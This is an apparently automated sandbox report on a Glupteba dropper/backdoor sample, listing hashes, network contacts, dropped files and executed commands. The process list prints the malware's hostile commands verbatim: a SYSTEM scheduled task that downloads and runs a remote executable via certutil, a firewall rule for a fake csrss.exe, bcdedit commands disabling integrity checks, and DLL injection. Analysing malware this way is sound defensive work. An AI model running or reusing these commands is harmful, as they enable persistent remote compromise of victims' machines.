Malware Analysis Report

2025-08-06 04:05

Sample ID 240121-v74klsfgd9
Target 6da0370835d68a8974fcb588fecb3fbf
SHA256 fcbfc875faa86d1db822019f11632e5609462177b12a4f0083f3f0f88093e2f7
Tags
glupteba metasploit backdoor dropper evasion loader trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

fcbfc875faa86d1db822019f11632e5609462177b12a4f0083f3f0f88093e2f7

Threat Level: Known bad

The file 6da0370835d68a8974fcb588fecb3fbf was found to be: Known bad.

Malicious Activity Summary

glupteba metasploit backdoor dropper evasion loader trojan

Glupteba payload

Glupteba

MetaSploit

Modifies boot configuration data using bcdedit

Possible attempt to disable PatchGuard

Modifies Windows Firewall

Program crash

GoLang User-Agent

Creates scheduled task(s)

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-01-21 17:38

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-01-21 17:38

Reported

2024-01-21 17:41

Platform

win7-20231129-en

Max time kernel

0s

Max time network

132s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe"

Signatures

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

MetaSploit

trojan backdoor metasploit

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Possible attempt to disable PatchGuard

evasion

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

GoLang User-Agent

Description Indicator Process Target
HTTP User-Agent header Go-http-client/1.1 N/A N/A
HTTP User-Agent header Go-http-client/1.1 N/A N/A
HTTP User-Agent header Go-http-client/1.1 N/A N/A

Processes

C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe

"C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe"

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20240121173852.log C:\Windows\Logs\CBS\CbsPersist_20240121173852.cab

C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe

"C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe /197-197

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

Network

Country Destination Domain Proto
US 8.8.8.8:53 ninhaine.com udp
US 8.8.8.8:53 2makestorage.com udp
US 8.8.8.8:53 nisdably.com udp
US 8.8.8.8:53 9c0e2ff7-2a45-47ec-97a7-2d9ce58e6af5.ninhaine.com udp
US 8.8.8.8:53 server9.ninhaine.com udp
CZ 46.8.8.100:443 server9.ninhaine.com tcp
CZ 46.8.8.100:443 server9.ninhaine.com tcp
US 8.8.8.8:53 msdl.microsoft.com udp
US 204.79.197.219:443 msdl.microsoft.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard30.blob.core.windows.net udp
US 8.8.8.8:53 apps.identrust.com udp
US 8.8.8.8:53 apps.identrust.com udp
GB 96.17.179.184:80 apps.identrust.com tcp
GB 96.17.179.205:80 apps.identrust.com tcp
US 8.8.8.8:53 www.microsoft.com udp
US 8.8.8.8:53 www.microsoft.com udp
US 20.150.38.228:443 vsblobprodscussu5shard30.blob.core.windows.net tcp
US 8.8.8.8:53 ww82.ninhaine.com udp
US 199.59.243.225:80 ww82.ninhaine.com tcp
US 199.59.243.225:80 ww82.ninhaine.com tcp
US 8.8.8.8:53 vsblobprodscussu5shard58.blob.core.windows.net udp
US 20.150.79.68:443 vsblobprodscussu5shard58.blob.core.windows.net tcp
CZ 46.8.8.100:443 server9.ninhaine.com tcp
US 199.59.243.225:80 ww82.ninhaine.com tcp
US 8.8.8.8:53 spolaect.info udp
CZ 46.8.8.100:443 server9.ninhaine.com tcp
CZ 46.8.8.100:443 server9.ninhaine.com tcp
US 199.59.243.225:80 ww82.ninhaine.com tcp

Files

memory/3032-0-0x0000000002AF0000-0x0000000002F2D000-memory.dmp

memory/3032-1-0x0000000002AF0000-0x0000000002F2D000-memory.dmp

memory/3032-2-0x0000000002F30000-0x0000000003857000-memory.dmp

memory/3032-3-0x0000000000400000-0x000000000258E000-memory.dmp

memory/2528-4-0x00000000028D0000-0x0000000002D0D000-memory.dmp

memory/3032-5-0x0000000000400000-0x000000000258E000-memory.dmp

memory/3032-6-0x0000000002F30000-0x0000000003857000-memory.dmp

memory/3032-7-0x0000000002AF0000-0x0000000002F2D000-memory.dmp

memory/2528-8-0x00000000028D0000-0x0000000002D0D000-memory.dmp

memory/2528-9-0x0000000000400000-0x000000000258E000-memory.dmp

\Windows\rss\csrss.exe

MD5 2c763260ff725d955728ac64dadf3958
SHA1 b335f3a6e525fd9e6ef60467160708d1c57ca545
SHA256 227a58c88ea338cf0acaa3693a545880e63fa5bd58a97f09acb1843d88df7cc4
SHA512 ff2243ef68efb03460d25aabc74883d9c972a013c5d4061aef25d8bfb8eb73a493bcd76320d61c1ce0ecfa3890373cf6c92703a1a2de26f9d2f5c3e909d70cab

C:\Windows\rss\csrss.exe

MD5 e0e462f7394a42e87d3cfa375cd94fc0
SHA1 8f9fd17b3716621d937cc8579d44b4b5672365ac
SHA256 b0193041bf4944a8ab2db47323b9a4e2d26e535cac2be88af6f23ad774a7ed99
SHA512 6db6e5386b1db8c31e1529f0e5b933b860d3c25efcc938cd22134ad32431fcc6a7ccaa3ee5c5c699c45f4a673fbbe2dffbd9b67ac7a21acf2f98956f15087d37

memory/2416-18-0x0000000002590000-0x00000000029CD000-memory.dmp

C:\Windows\rss\csrss.exe

MD5 c26036e7be1c7717ff2e3a804b2d75a3
SHA1 a0ec868a916a4e291b783efa195424955bf11cd9
SHA256 95287ab95c5a2acc05c8a01d154de1bf719585fcbfd132416088512d74029e5b
SHA512 9f26f47f6acb614b52edcaca0d8c9123475464479c4e6dccd718963163e31b4dcaf624789fd26043f05de4893bf961a12eaa3a1f10d35bc88ae1b18bb10be8fd

\Windows\rss\csrss.exe

MD5 d23cab124d8ccf930b2d1fad102fd2a7
SHA1 0b13d0dd1c8f66ccb8cb8fb373eb6f7bbaf48781
SHA256 09be4c8472334b9ec35bf3c1b97b0a2726e527e30a92408ee1854c1bb445966e
SHA512 649b860ff48bf46f91813f7b9e0ad2d1c56610b4f0a6ef5428878cc4fdeb11d7dc6634a5f2e0b27d54504cc8955757e91aecf4581d50b2142e242d9a51d2187b

memory/2528-19-0x0000000000400000-0x000000000258E000-memory.dmp

memory/2416-20-0x0000000002590000-0x00000000029CD000-memory.dmp

C:\Windows\rss\csrss.exe

MD5 fd785bbb06ce98864a925df95e16b8c5
SHA1 03e4cc85670fc80cb6e98029645ea955fd5f2974
SHA256 6d7011d41d349a0a28428df0cc114c1ba0238c8060d2298579ccbcc22d629ebe
SHA512 f0bef8c21c154437503f02bb04e0da1381ab251c4f4b41883c3f46f77b3000f88f2208b3dfe56d76683fa6197be225d891a208c085f0a2b086be8debf0d28891

memory/2416-22-0x0000000000400000-0x000000000258E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

MD5 ee3339f6749c89218df70f883273a8a5
SHA1 b971f12080009f8de374c223fd3721528c9a8dfa
SHA256 4763e68a4c2bffa30f49b70564810915904412f53b2117df9af87a21a1873899
SHA512 71852c25b487d367f368bb39f334cc76f06a1726880e1c71071a96809cd43bdb97a2bf5da54c3f1c5225100cf0e7ddf956986c10a4fc82be32f76a4e756d7c29

\Users\Admin\AppData\Local\Temp\symsrv.dll

MD5 5c399d34d8dc01741269ff1f1aca7554
SHA1 e0ceed500d3cef5558f3f55d33ba9c3a709e8f55
SHA256 e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f
SHA512 8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d

\Users\Admin\AppData\Local\Temp\dbghelp.dll

MD5 117b6ea2c794811428fea2fc25eae383
SHA1 d5673c2832adaa659badc1baa135420fc63ae889
SHA256 a89e6c0c06c2c8fcc7620d123dc81f1bbd0915c15dfae1e5c9c45af11b446996
SHA512 52a20cd725c9ea068e6bae97c59b7716ef6fb844b578b55f16842a9006254a6e59afb25ba7dc0cdace243a576b75c10b8a910afaef526349f9892ab6631eafb3

memory/2612-41-0x0000000140000000-0x00000001405E8000-memory.dmp

memory/2612-42-0x0000000140000000-0x00000001405E8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 2741c1f51b156c3cc4d8354e7ece80fd
SHA1 595ad9adb7bb5a2fa6d0ea702a929fd9e92aae24
SHA256 c4c5e8302363960a159c38d0cb1e926e6703530f6caf858d4636ca0253213adb
SHA512 490d5fb5abaa72b42603bfc2660907dee82234cb0f88760ac9496edfe9c62a3673e979c5a51dbf34da0a9be8a7a4731853f0af51e0bf52863fc55f1cd961f9c8

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 40994b10b6ae95dcef1d22c91cae0ae9
SHA1 85459e6b4eefcc0c15df157413a8fe6358dfa4d1
SHA256 7dd45d5e762f72da56a5daf0d2bf4d1dc4255dff18422bbba099f7fbabd77d08
SHA512 e593475b72fb90e3a200a13dfd9540b5f155ee4c38d95cbb0f5db197f2167c7b35911479680c6fa75b36617fcc67fe7398ce670f05d789167372ed1500c64844

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 e5fb512f3dd17d1302f02f000dfe5693
SHA1 95529fe6f04aa1039c8795d7550d1446762af009
SHA256 5381925c4a34a536ba0c2fa93d391252d91ca5d453768feec133ad547ffe3c79
SHA512 fec4d96f82b32786dbdafd075b9f940298ba8654fbfa5cb18d14078e0fd95bacb61acdc532058fc71bc46f0824c0eca242641947956495bfc4c8910aadf5dbe9

\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe

MD5 0791570b2d0769f0a251dde143c16bf4
SHA1 40805bacf3116e06bd0453de7484858f4e1e7e82
SHA256 7e36a77bc6ac8b20b50e036f9b59d09102027435b99874b6431b79b735b0f29f
SHA512 c431e7fd6c2603f5310ab41dcb6036fa1eb479d5c020d446dc0348bc9a3ed97d31b0046db2e073ca7832c8bfc43c9d9f8a7212959009d9215bc54877400d0c9a

\Users\Admin\AppData\Local\Temp\csrss\patch.exe

MD5 bf78afa0bf26d0b7448b2f3a2acc32f4
SHA1 9d8ab648e689f0a6ead9878ad33d21c8829b356b
SHA256 a2148f29b2226818f37ddcc59743cefef0145defad6d4fca74210ca0ecef49dd
SHA512 71765cbd6754567987a7bbb451424e78260ad22ad159f9726746ac4db80192f51171818bd0490027bd8c2aff9fffbb3aa043e190e469518b57f97b88ca37024e

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

MD5 d71dff97ca86ca16c3db8bdb5285fb35
SHA1 271c01246897497d069b81ed37af296cf6c1e498
SHA256 4a19255504acfbd49c4e1aed722c7e62b50b5742b860eedabc5f46160f8aefac
SHA512 1fed2a183296b563e35d803927e539d28169895f6ca5b522a1c714f222a2d3e578b1e167b19568b5ad4800b898f7ac041c7bd8f6bb02d1361b32cbdcfb0f682a

C:\Windows\Temp\Tar3597.tmp

MD5 07a8f54a0752a9853479aeb2129f599d
SHA1 02d76478c642a21356716ecdf620ec4863936b71
SHA256 fa1e7fc24766633ae74bfefa9c10c11cc788862b8cfe5f75396b20aa84a4a593
SHA512 f23bb7376ac31bdcff8a7981dfd7711702113c9159cc7e3ddda520ae0c6f35b768d30755a8e2374196b47edf906dbc6e5d1fadfb5831f263d4c557211f2ad54f

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 fbb403b06bae03197b6d95bd468d8527
SHA1 09bb35f55ac81f51375a6122afe0ca4a26bf3800
SHA256 f50a04c75dc5be1b12a52cb163fd3ff176f24078f78fde575e7ecb3754e1157d
SHA512 bd35baa4ec3187d5e70d0852853bab4abde2df4a4bd5e2a2ee35399870ec616539046e0bcb92406488bc9618187ea01836e76da02750d52c28534e7b7e1e5015

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 d44640c7ac51cc9049e03edeee8b96fd
SHA1 37eb0fa6fd118d17b5455317d1ae639e7ef56251
SHA256 c5def655c89dded84a37a3dbbd84b907680f121dcd5ec20b8ef0823b34d4169b
SHA512 4a08b9c4d1908e7541457dd3cc6712c3509443a38053835943b602f2aac74c91f4c544dd0593d029d14b78a9cfcd9e3f0b638bfacfcb544fe129c76a837e1e1b

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

MD5 a266bb7dcc38a562631361bbf61dd11b
SHA1 3b1efd3a66ea28b16697394703a72ca340a05bd5
SHA256 df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e
SHA512 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

memory/2416-211-0x0000000000400000-0x000000000258E000-memory.dmp

memory/2416-212-0x0000000002590000-0x00000000029CD000-memory.dmp

memory/2416-216-0x0000000000400000-0x000000000258E000-memory.dmp

memory/2416-217-0x0000000000400000-0x000000000258E000-memory.dmp

memory/2416-218-0x0000000000400000-0x000000000258E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error

MD5 f0e11df20b7732e8fa70a359cb661c23
SHA1 2d02b0d8c0c6b7bd2e1b90bfaf6e9a0d2c39a2fb
SHA256 ddcea3218320cdc914a65e9b4b2d3fcc10dd482d1fa9edce8d7d05e3457f06e5
SHA512 c8eb0d1541e8a7256030b9990a54f27314a1bda82bbe99955dc7afbaec83163d460cc9007153d60aaf2780514700f7a0ab40c7e56001f11fe3a02ffae69c94ec

C:\Users\Admin\AppData\Local\Temp\osloader.exe

MD5 e2f68dc7fbd6e0bf031ca3809a739346
SHA1 9c35494898e65c8a62887f28e04c0359ab6f63f5
SHA256 b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4
SHA512 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579

C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error

MD5 5da3a881ef991e8010deed799f1a5aaf
SHA1 fea1acea7ed96d7c9788783781e90a2ea48c1a53
SHA256 f18fdb9e03546bfb98397bcb8378b505eaf4ac061749229a7ee92a1c3cf156e4
SHA512 24fbcb5353a3d51ee01f1de1bbb965f9e40e0d00e52c42713d446f12edceeb8d08b086a8687a6188decaa8f256899e24a06c424d8d73adaad910149a9c45ef09

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

MD5 d98e78fd57db58a11f880b45bb659767
SHA1 ab70c0d3bd9103c07632eeecee9f51d198ed0e76
SHA256 414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0
SHA512 aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831

C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 38b7eabd6a868cdfebcb09d110c67825
SHA1 7225a012527be250763f52d14250ff0556ac8a9e
SHA256 42ef174b129710297bdde703f78941a7d711aa5544751fa610fdfc413ea0bfbe
SHA512 5655e52d7506b00e40968a1131be1684d8bf09f60e87493d63ed9337f5d90d899ff198c110bbcf2bae594b6f22d126171b3dfeda4538ba456dcac7bbfe18cb41

memory/2416-271-0x0000000000400000-0x000000000258E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

MD5 d98e33b66343e7c96158444127a117f6
SHA1 bb716c5509a2bf345c6c1152f6e3e1452d39d50d
SHA256 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1
SHA512 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5

memory/2416-301-0x0000000000400000-0x000000000258E000-memory.dmp

memory/2416-302-0x0000000000400000-0x000000000258E000-memory.dmp

memory/2416-303-0x0000000000400000-0x000000000258E000-memory.dmp

memory/2416-328-0x0000000000400000-0x000000000258E000-memory.dmp

memory/2416-329-0x0000000000400000-0x000000000258E000-memory.dmp

memory/2416-330-0x0000000000400000-0x000000000258E000-memory.dmp

memory/2416-331-0x0000000000400000-0x000000000258E000-memory.dmp

memory/2416-332-0x0000000000400000-0x000000000258E000-memory.dmp

memory/2416-333-0x0000000000400000-0x000000000258E000-memory.dmp

memory/2416-334-0x0000000000400000-0x000000000258E000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-01-21 17:38

Reported

2024-01-21 17:41

Platform

win10v2004-20231222-en

Max time kernel

1s

Max time network

146s

Command Line

"C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe"

Signatures

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

MetaSploit

trojan backdoor metasploit

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Users\Admin\AppData\Local\Temp\6da0370835d68a8974fcb588fecb3fbf.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\rss\csrss.exe
